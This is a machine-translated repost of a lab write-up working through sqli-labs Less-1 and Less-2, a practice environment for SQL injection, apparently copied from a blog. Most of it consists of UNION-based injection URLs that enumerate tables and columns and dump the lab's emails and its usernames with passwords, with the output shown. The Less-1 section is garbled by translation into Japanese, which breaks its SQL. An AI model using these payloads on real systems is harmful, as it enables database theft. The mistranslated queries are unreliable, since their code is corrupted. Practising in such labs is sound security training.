【実践】記録SQLI、ラボ

その他 2019-09-14 02:24:08 訪問数: null

あまり-1:

 星1.順序は、検査用テーブルには、三つのフィールドがある
  ことでhttp://192.168.40.165/sqli-labs-master/Less-1/?id=1「順番を3 - 。+
2組合が提供するデータベースを選択します--security名
  + - 。http://192.168.40.165/sqli-labs-master/Less-1/?id=-1「SELECT連合1、データベース()、2
INFORMATION_SCHEMAから選択GROUP_CONCAT(TABLE_NAME)との3を.columns TABLE_SCHEMA =データベース()データテーブル--emailsを取得するには、リファラー、リファラー、uagents、ユーザー
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1「SELECT連合。1 + - 、データベース()は、(TABLE_SCHEMA =()information_schema.columnsからのデータベースからGROUP_CONCAT(TABLE_NAME)を選択)
information_schema.columnsから選択GROUP_CONCAT(COLUMN_NAME)4. TABLE_NAME = 'メール' フィールド名は、テーブル内のデータを取得します--id、EMAIL_ID
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1組合(information_schema.columnsからGROUP_CONCAT(COLUMN_NAME)を選択TABLE_NAME =、1 SELECT '電子メール')、データベース() - - +
電子メールから選択GROUP_CONCAT(ID、EMAIL_ID)用5.得到字段的值--name:1Dumb @ dhakkan.com、2Angel @ iloveu.com、3Dummy @ dhakkan.local、4secure @ dhakkan.local、5stupid @ dhakkan。地元、6superman @ dhakkan.local、7batman @ dhakkan.local、8admin @ dhakkan.com
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1組合は1を選択し、(GROUP_CONCATを選択電子メールから(ID、EMAIL_ID))、データベース() - +

以下-2

2内部「と」も使用することができ、実際に障害が発生し、良いファンがああ、単に「順」

     

  • 3件のデータがあります。
    • + - 3によってhttp://192.168.40.165/sqli-labs-master/Less-2/?id=1順
  • 現在のデータベース:セキュリティ
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1組合は、1を選択したデータベース()、3 - +
  • security里面的数据表:_emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_users,_users,_users
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat('_',table_name) from information_schema.columns where table_schema=database())--+
  • users表里的字段:user_id,first_name,last_name,user,password,avatar,id,username,password
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name='users')--+
  • 得到字段值:DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(username,password) from users),(select group_concat(column_name) from information_schema.columns where table_name='users')--+

    

 

おすすめ

転載: www.cnblogs.com/chrysanthemum/p/11518038.html
おすすめ
ランキング
1028リストの並べ替え(25分)
pom.xml ファイルがアイデアによって認識されません
単一テーブルのデータのSQLクエリ組み合わせ(C)
gitのinitとgitの初期化-bare違いやソースファイルなしで問題を解決するには、WWWで見ることができません
BULLETエンジンスターター - コンパイル(cmakeのとPreMake)
vue-crossドメインの問題
ThingsBoard フロントエンド プロジェクトの組み込みコンポーネント開発
単元の学習過程での難しい問題とその解決策 -----(1)
MongoDBのデータは、クライアントで表示することができますが、作業はコマンドラインでlinuxでありません
How to check your PYTHONPATH environment variable
アーカイブ
もっと
2024-06-02(0)
2024-06-01(1)
2024-05-31(1)
2024-05-30(0)
2024-05-29(1)
2024-05-28(0)
2024-05-27(1)
2024-05-26(0)
2024-05-25(1)
2024-05-24(11)

コードワールド

© 2018 codetd.com